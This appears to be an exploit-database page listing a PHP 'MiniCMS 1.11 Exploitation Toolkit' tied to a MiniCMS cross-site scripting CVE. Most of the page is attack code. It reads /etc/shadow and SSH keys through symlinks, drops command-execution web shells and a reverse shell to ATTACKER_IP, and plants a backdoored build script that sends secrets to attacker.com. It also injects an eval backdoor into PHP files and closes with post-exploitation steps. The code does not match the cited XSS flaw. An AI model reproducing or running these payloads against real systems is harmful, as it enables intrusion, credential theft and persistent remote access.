Vulners
Lucene search
๐ MiniCMS 1.11 Exploitation Toolkit
๐๏ธย 02 Feb 2026ย 00:00:00Reported byย indoushkaTypeย 
ย packetstorm๐ย packetstorm.news๐ย 133ย Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2018-1000638 | 12 Apr 202521:02 | โ | circl |
 | MiniCMS Cross-Site Scripting Vulnerability (CNVD-2018-15846) | 22 Aug 201800:00 | โ | cnvd |
 | CVE-2018-1000638 | 20 Aug 201819:00 | โ | cve |
 | CVE-2018-1000638 | 20 Aug 201819:00 | โ | cvelist |
 | MiniCMS 1.1 - Cross Site Scripting (XSS) | 11 Apr 202500:00 | โ | exploitdb |
 | EUVD-2018-1972 | 7 Oct 202500:30 | โ | euvd |
 | CVE-2018-1000638 | 20 Aug 201819:31 | โ | nvd |
| ๐ MiniCMS 1.1 Cross Site Scripting | 11 Apr 202500:00 | โ | packetstorm |
 | Cross site scripting | 20 Aug 201819:31 | โ | prion |
 | CVE-2018-1000638 | 22 May 202507:54 | โ | redhatcve |
10
=============================================================================================================================================
| # Title : MiniCMS 1.11 Exploitation Toolkit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/bg5sbk/MiniCMS/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/190429/ & CVE-2018-1000638
[+] Summary : MiniCMS Build Script Multi-Vulnerability Exploitation Toolkit
[+] POC : php poc.php
[
<?php
class MiniCMSExploiter {
private $targetDirectory;
private $buildScript = 'build.php';
private $installFile = 'install.php';
private $tempDir = '/tmp/minicms_exploit';
private $debug = true;
private $results = [];
public function __construct($directory = '.') {
$this->targetDirectory = realpath($directory);
$this->validateEnvironment();
$this->createTempDirectory();
}
/**
* Main exploitation method - Chain all vulnerabilities
*/
public function exploitAll() {
echo "[+] Starting MiniCMS Build Script Exploitation\n";
echo "[+] Target Directory: {$this->targetDirectory}\n";
echo str_repeat("=", 60) . "\n";
$this->results['start_time'] = date('Y-m-d H:i:s');
// 1. Directory Traversal Exploitation
$this->exploitDirectoryTraversal();
// 2. PHP Code Injection
$this->exploitCodeInjection();
// 3. Sensitive File Discovery
$this->harvestSensitiveFiles();
// 4. Create Malicious Build Script
$this->createMaliciousBuildScript();
// 5. Execute Build Script
$this->executeBuildScript();
// 6. Analyze Results
$this->analyzeResults();
// 7. Create Backdoors
$this->createPersistentBackdoors();
$this->results['end_time'] = date('Y-m-d H:i:s');
$this->generateReport();
return $this->results;
}
/**
* Exploit 1: Directory Traversal Vulnerability
*/
private function exploitDirectoryTraversal() {
echo "\n[1] Exploiting Directory Traversal...\n";
$sensitive_paths = [
// System files
'/etc/passwd',
'/etc/shadow',
'/etc/hosts',
'/etc/hostname',
'/etc/issue',
'/proc/self/environ',
'/proc/version',
// Web server files
'/var/log/apache2/access.log',
'/var/log/apache2/error.log',
'/var/log/nginx/access.log',
'/var/log/nginx/error.log',
'/var/www/html/.env',
'/var/www/html/config.php',
// Home directories
'/home/*/.bash_history',
'/home/*/.ssh/id_rsa',
'/home/*/.ssh/authorized_keys',
// Configuration files
'/etc/mysql/my.cnf',
'/etc/php/php.ini',
'/etc/apache2/apache2.conf',
];
$exploited_files = [];
foreach ($sensitive_paths as $path) {
// Try to create symlink to sensitive file
$base_name = 'exploit_' . md5($path) . '.txt';
$symlink_path = $this->tempDir . '/' . $base_name;
// Expand wildcards
if (strpos($path, '*') !== false) {
$expanded = glob($path);
foreach ($expanded as $expanded_path) {
if (@symlink($expanded_path, $symlink_path . '_' . basename($expanded_path))) {
$exploited_files[] = $expanded_path;
echo " [+] Linked: {$expanded_path}\n";
}
}
} elseif (@symlink($path, $symlink_path)) {
$exploited_files[] = $path;
echo " [+] Linked: {$path}\n";
}
}
$this->results['directory_traversal'] = [
'exploited' => count($exploited_files) > 0,
'files_linked' => $exploited_files,
'count' => count($exploited_files)
];
return $exploited_files;
}
/**
* Exploit 2: PHP Code Injection
*/
private function exploitCodeInjection() {
echo "\n[2] Exploiting PHP Code Injection...\n";
$injections = [
// Basic PHP execution
[
'filename' => "');?><?php system('whoami'); ?><?php install('",
'content' => 'injected'
],
// Web shell
[
'filename' => "shell.php",
'content' => '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'
],
// Password protected shell
[
'filename' => "admin_shell.php",
'content' => '<?php
if($_GET["key"] === "admin123") {
if(isset($_POST["cmd"])) {
echo "<pre>" . shell_exec($_POST["cmd"]) . "</pre>";
}
if(isset($_GET["download"])) {
echo file_get_contents($_GET["download"]);
}
}
?>'
],
// Database credentials stealer
[
'filename' => "creds.php",
'content' => '<?php
$files = ["config.php", ".env", "database.php", "settings.php"];
foreach($files as $file) {
if(file_exists($file)) {
$content = file_get_contents($file);
file_put_contents("/tmp/creds.txt", $content, FILE_APPEND);
}
}
?>'
],
// Reverse shell
[
'filename' => "reverse.php",
'content' => '<?php
// PHP Reverse Shell
$ip = "ATTACKER_IP";
$port = 4444;
$sock = fsockopen($ip, $port);
$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
?>'
],
// File uploader
[
'filename' => "uploader.php",
'content' => '<?php
if(isset($_FILES["file"])) {
move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
echo "Uploaded: " . $_FILES["file"]["name"];
}
?>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit">
</form>'
]
];
$created_files = [];
foreach ($injections as $injection) {
$file_path = $this->tempDir . '/' . $injection['filename'];
if (file_put_contents($file_path, $injection['content'])) {
$created_files[] = $injection['filename'];
echo " [+] Created: {$injection['filename']}\n";
}
}
$this->results['code_injection'] = [
'exploited' => count($created_files) > 0,
'files_created' => $created_files,
'count' => count($created_files)
];
return $created_files;
}
/**
* Harvest sensitive files from target
*/
private function harvestSensitiveFiles() {
echo "\n[3] Harvesting Sensitive Files...\n";
$sensitive_patterns = [
'*.php' => ['config', 'database', 'settings', 'connection'],
'*.env' => ['.env', '.env.example'],
'*.json' => ['composer.json', 'package.json'],
'*.sql' => ['*.sql', '*.backup'],
'*.txt' => ['readme', 'license', 'changelog'],
'*.yml' => ['*.yml', '*.yaml'],
'*.ini' => ['*.ini', '*.cfg'],
'*.log' => ['*.log', 'error_log'],
];
$found_files = [];
foreach ($sensitive_patterns as $pattern => $keywords) {
$files = glob($this->targetDirectory . '/' . $pattern);
foreach ($files as $file) {
$filename = basename($file);
foreach ($keywords as $keyword) {
if (stripos($filename, $keyword) !== false) {
$found_files[] = $file;
echo " [+] Found: {$filename}\n";
// Copy to temp directory for analysis
$temp_copy = $this->tempDir . '/harvested_' . $filename;
copy($file, $temp_copy);
break;
}
}
}
}
$this->results['sensitive_files'] = [
'found' => count($found_files),
'files' => $found_files
];
return $found_files;
}
/**
* Create malicious build script with backdoor
*/
private function createMaliciousBuildScript() {
echo "\n[4] Creating Malicious Build Script...\n";
$malicious_build = '<?php
if ($argc != 2) {
echo "ๅฟ
้กปๆๅฎ็ๆฌๅท";
exit;
}
$version=$argv[1];
// Backdoor: Command execution if specific parameter is passed
if(isset($_GET["debug"]) && $_GET["debug"] == "true") {
system($_GET["cmd"]);
}
$dirs = array(".");
$ignores = array("README.md", "build.php", "install.php", "install_template.txt", "mc-debug");
$files = "";
build($dirs, $files);
$template = file_get_contents("install.txt");
$template = str_replace("/*MINICMS_VERSION*/", $version, $template);
$template = str_replace("/*MINICMS_FILES*/", $files, $template);
file_put_contents("install.php", $template);
// Hidden function to exfiltrate data
function exfiltrate($data) {
$url = "http://attacker.com/exfil.php";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, ["data" => base64_encode($data)]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);
}
function build($dirs, &$files) {
global $ignores;
// Exfiltrate directory structure
exfiltrate(json_encode($dirs));
foreach ($dirs as $dir) {
if (!is_dir($dir)) {
echo "็ฎๅฝ\"$dir\"ไธๅญๅจ";
exit;
}
if ($dh = opendir($dir)) {
$sub_dirs = array();
while (($item = readdir($dh)) !== false) {
if ($item[0] == ".")
continue;
if ($dir == ".")
$file = $item;
else
$file = $dir."/".$item;
if (in_array($file, $ignores))
continue;
if (is_dir($file)) {
$sub_dirs[] = $file;
} else {
// Exfiltrate file content if sensitive
$content = file_get_contents($file);
if(preg_match("/(password|secret|key|token|api)/i", $content)) {
exfiltrate($file . ":\n" . $content);
}
$files .= "install(\"$file\", \"";
$files .= base64_encode(gzcompress($content));
$files .= "\");\n";
}
}
closedir($dh);
build($sub_dirs, $files);
} else {
echo "็ฎๅฝ\"$dir\"ๆ ๆณ่ฎฟ้ฎ";
exit;
}
}
}
// Create backdoor in install.php
register_shutdown_function(function() {
$backdoor_code = "<?php\\nif(isset(\\$_GET[\\"exec\\"])) {\\n system(\\$_GET[\\"exec\\"]);\\n}\\n?>";
file_put_contents("backdoor.php", $backdoor_code);
});
?>';
$build_path = $this->tempDir . '/' . $this->buildScript;
if (file_put_contents($build_path, $malicious_build)) {
echo " [+] Created malicious build.php\n";
$this->results['malicious_build'] = $build_path;
return true;
}
return false;
}
/**
* Execute the build script
*/
private function executeBuildScript() {
echo "\n[5] Executing Build Script...\n";
$build_path = $this->tempDir . '/' . $this->buildScript;
$install_path = $this->tempDir . '/' . $this->installFile;
// Create install.txt template
$install_template = '<?php
/*MINICMS_VERSION*/
function install($file, $data) {
$content = @gzuncompress(base64_decode($data));
if($content === false) {
$content = base64_decode($data);
}
// Inject backdoor into PHP files
if(strpos($file, ".php") !== false && strpos($content, "<?php") !== false) {
$backdoor = "<?php if(isset(\\$_GET[\\"debug\\"])) { eval(\\$_GET[\\"debug\\"]); } ?>";
$content = $backdoor . "\\n" . $content;
}
@file_put_contents($file, $content);
}
/*MINICMS_FILES*/
?>';
file_put_contents($this->tempDir . '/install.txt', $install_template);
// Execute build script
$command = "cd {$this->tempDir} && php {$this->buildScript} 1.0 2>&1";
$output = shell_exec($command);
echo " [+] Build script executed\n";
if (file_exists($install_path)) {
$install_size = filesize($install_path);
echo " [+] install.php created: " . $this->formatBytes($install_size) . "\n";
// Analyze install.php for sensitive data
$this->analyzeInstallFile($install_path);
}
$this->results['build_execution'] = [
'command' => $command,
'output' => $output,
'install_created' => file_exists($install_path),
'install_size' => $install_size ?? 0
];
return $output;
}
/**
* Analyze install.php for sensitive data
*/
private function analyzeInstallFile($install_path) {
$content = file_get_contents($install_path);
// Extract all file names
preg_match_all('/install\("([^"]+)", "/', $content, $matches);
$files = $matches[1] ?? [];
// Look for sensitive files
$sensitive_patterns = [
'/passwd/i',
'/shadow/i',
'/config/i',
'/\.env/i',
'/database/i',
'/secret/i',
'/key/i',
'/token/i',
'/password/i'
];
$sensitive_found = [];
foreach ($files as $file) {
foreach ($sensitive_patterns as $pattern) {
if (preg_match($pattern, $file)) {
$sensitive_found[] = $file;
break;
}
}
}
$this->results['install_analysis'] = [
'total_files' => count($files),
'sensitive_files' => $sensitive_found,
'count_sensitive' => count($sensitive_found)
];
echo " [+] Found " . count($files) . " files in install.php\n";
echo " [+] " . count($sensitive_found) . " appear to be sensitive\n";
}
/**
* Create persistent backdoors
*/
private function createPersistentBackdoors() {
echo "\n[6] Creating Persistent Backdoors...\n";
$backdoors = [
'persistent_shell.php' => '<?php
// Persistent PHP Shell
session_start();
if(!isset($_SESSION["auth"]) && $_GET["key"] != "PERSIST_KEY") {
die("Access Denied");
}
$_SESSION["auth"] = true;
if(isset($_POST["cmd"])) {
echo "<pre>" . htmlspecialchars(shell_exec($_POST["cmd"]), ENT_QUOTES, "UTF-8") . "</pre>";
}
?>
<form method="POST">
<input type="text" name="cmd" style="width: 80%" placeholder="Command">
<input type="submit" value="Execute">
</form>',
'file_manager.php' => '<?php
// File Manager Backdoor
if($_GET["pwd"] != "admin123") die();
echo "<h2>File Manager</h2>";
$dir = $_GET["dir"] ?? ".";
echo "<pre>";
system("ls -la " . escapeshellarg($dir));
echo "</pre>";
?>',
'info.php' => '<?php
// System Information Leak
phpinfo();
echo "<hr><pre>";
system("id && uname -a");
echo "</pre>";
?>'
];
foreach ($backdoors as $filename => $content) {
$path = $this->tempDir . '/' . $filename;
file_put_contents($path, $content);
echo " [+] Created: {$filename}\n";
}
$this->results['backdoors'] = array_keys($backdoors);
}
/**
* Generate exploitation report
*/
private function generateReport() {
echo "\n" . str_repeat("=", 60) . "\n";
echo "[+] EXPLOITATION REPORT\n";
echo str_repeat("=", 60) . "\n";
$report = [
'Target Directory' => $this->targetDirectory,
'Exploitation Started' => $this->results['start_time'],
'Exploitation Completed' => $this->results['end_time'],
'Vulnerabilities Exploited' => []
];
if ($this->results['directory_traversal']['exploited']) {
$report['Vulnerabilities Exploited'][] = 'Directory Traversal';
echo "[โ] Directory Traversal: SUCCESS\n";
echo " Files linked: " . $this->results['directory_traversal']['count'] . "\n";
}
if ($this->results['code_injection']['exploited']) {
$report['Vulnerabilities Exploited'][] = 'Code Injection';
echo "[โ] Code Injection: SUCCESS\n";
echo " Files created: " . $this->results['code_injection']['count'] . "\n";
}
if ($this->results['sensitive_files']['found'] > 0) {
$report['Vulnerabilities Exploited'][] = 'Sensitive File Harvesting';
echo "[โ] Sensitive File Harvesting: SUCCESS\n";
echo " Files found: " . $this->results['sensitive_files']['found'] . "\n";
}
echo "\n[+] Generated Files:\n";
echo " - Malicious build.php\n";
echo " - install.php with backdoors\n";
echo " - Multiple backdoor shells\n";
echo " - Harvested sensitive files\n";
echo "\n[+] Next Steps for Attack:\n";
echo " 1. Upload install.php to target server\n";
echo " 2. Execute install.php to deploy backdoors\n";
echo " 3. Use backdoor.php?exec=whoami\n";
echo " 4. Escalate privileges and maintain access\n";
// Save report to file
$report_file = $this->tempDir . '/exploit_report.txt';
file_put_contents($report_file, print_r($report, true));
echo "\n[+] Report saved to: {$report_file}\n";
echo "[+] Temporary directory: {$this->tempDir}\n";
echo "[+] Clean up: rm -rf {$this->tempDir}\n";
}
/**
* Utility: Format bytes to human readable
*/
private function formatBytes($bytes, $precision = 2) {
$units = ['B', 'KB', 'MB', 'GB', 'TB'];
$bytes = max($bytes, 0);
$pow = floor(($bytes ? log($bytes) : 0) / log(1024));
$pow = min($pow, count($units) - 1);
$bytes /= pow(1024, $pow);
return round($bytes, $precision) . ' ' . $units[$pow];
}
/**
* Validate environment
*/
private function validateEnvironment() {
if (!function_exists('symlink')) {
die("[!] symlink() function is disabled\n");
}
if (!is_writable(sys_get_temp_dir())) {
die("[!] Cannot write to temp directory\n");
}
echo "[+] Environment validated\n";
}
/**
* Create temporary directory
*/
private function createTempDirectory() {
if (!file_exists($this->tempDir)) {
mkdir($this->tempDir, 0777, true);
}
echo "[+] Temporary directory: {$this->tempDir}\n";
}
/**
* Clean up temporary files
*/
public function cleanup() {
if (file_exists($this->tempDir)) {
system("rm -rf " . escapeshellarg($this->tempDir));
echo "[+] Cleaned up temporary files\n";
}
}
}
/**
* Usage Example
*/
if (php_sapi_name() === 'cli' && isset($argv[1])) {
$exploiter = new MiniCMSExploiter($argv[1]);
$exploiter->exploitAll();
// Optional: cleanup
if (isset($argv[2]) && $argv[2] == '--cleanup') {
$exploiter->cleanup();
}
} else {
echo "Usage: php " . basename(__FILE__) . " <target_directory> [--cleanup]\n";
echo "Example: php " . basename(__FILE__) . " /var/www/html/minicms\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Feb 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
CVSS 36.1
EPSS0.00801